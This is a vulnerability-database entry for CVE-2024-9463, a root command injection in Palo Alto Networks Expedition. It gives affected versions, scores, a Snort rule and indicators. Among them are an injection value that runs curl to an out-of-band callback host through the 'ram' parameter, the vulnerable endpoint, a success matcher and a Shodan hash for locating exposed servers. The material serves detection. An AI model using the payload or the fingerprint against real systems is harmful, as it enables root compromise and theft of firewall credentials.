cbcvebase.
CVE-2024-9463
published 2024-10-09

CVE-2024-9463: An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition…

PriorityP193high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2024-12-05
Exploited in the wild
EPSS
98.42%
99.9th percentile
An OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to run arbitrary OS commands as root in Expedition, resulting in disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.

Affected

5 ranges
VendorProductVersion rangeFixed in
palo_alto_networksexpedition>= 1.2.0 < 1.2.961.2.96
paloaltopan-os
paloaltopanorama
paloaltoprisma_access
paloaltonetworksexpedition>= 1.2.0 < 1.2.961.2.96

Detection & IOCsextracted from sources · hover to see the quote

path/API/convertCSVtoParquet.php
path/OS/startup/restore/restoreAdmin.php
path/bin/CronJobs.php
commandram=watchTowr`curl+{{interactsh-url}}`
otherhttp.favicon.hash:1499876150
snort
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto Expedition Remote Code Execution (CVE-2024-9463)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/API/convertCSVtoParquet.php"; fast_pattern; nocase; http.request_body; content:"ram|3d|"; pcre:"/^.*?[\x3b\x0a\x26\x60\x7c\x24]/R"; reference:cve,2024-9463; reference:url,x.com/watchtowrcyber/status/1844306954245767623; classtype:web-application-attack; sid:2057721; rev:1; metadata:affected_product Palo_Alto_Networks, attack_target Server, tls_state TLSDecrypt, created_at 2024_11_19, cve CVE_2024_9463, deployment Perimeter, deployment Internal, deployment SSLDecrypt, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, updated_at 2024_11_19, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application; target:dest_ip;)
  • Exploit targets HTTP POST to /API/convertCSVtoParquet.php with a 'ram' parameter containing OS command injection payloads using shell metacharacters (backtick, semicolon, pipe, ampersand, newline, $)
  • Successful exploitation of CVE-2024-9463 results in the response body containing 'Undefined index: taskID', which can be used as a confirmation matcher
  • Palo Alto Expedition instances can be fingerprinted on Shodan using favicon hash 1499876150 to identify exposed attack surface
  • The vulnerability is actively exploited in the wild and listed in CISA's Known Exploited Vulnerabilities Catalog; monitor for unauthenticated POST requests to Expedition PHP endpoints
  • ·The Snort/ET rule requires TLS decryption (SSLDecrypt) to inspect the POST body for the 'ram' parameter injection payload; without TLS inspection, the rule will not fire on HTTPS traffic
  • ·The nuclei template uses out-of-band (interactsh) callback detection; the 'Undefined index: taskID' body matcher alone is not sufficient to confirm exploitation without the OOB DNS/HTTP interaction
  • ·According to Wiz data, Expedition is exposed to the internet in less than 1% of cloud environments, with only 106 exposed servers found by FOFA; detection efforts should prioritize on-premises and hybrid deployments

CVSS provenance

nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
nvdv4.09.9CRITICALCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:C/RE:H/U:Amber
vulncheck9.9CRITICAL
cisa9.9CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.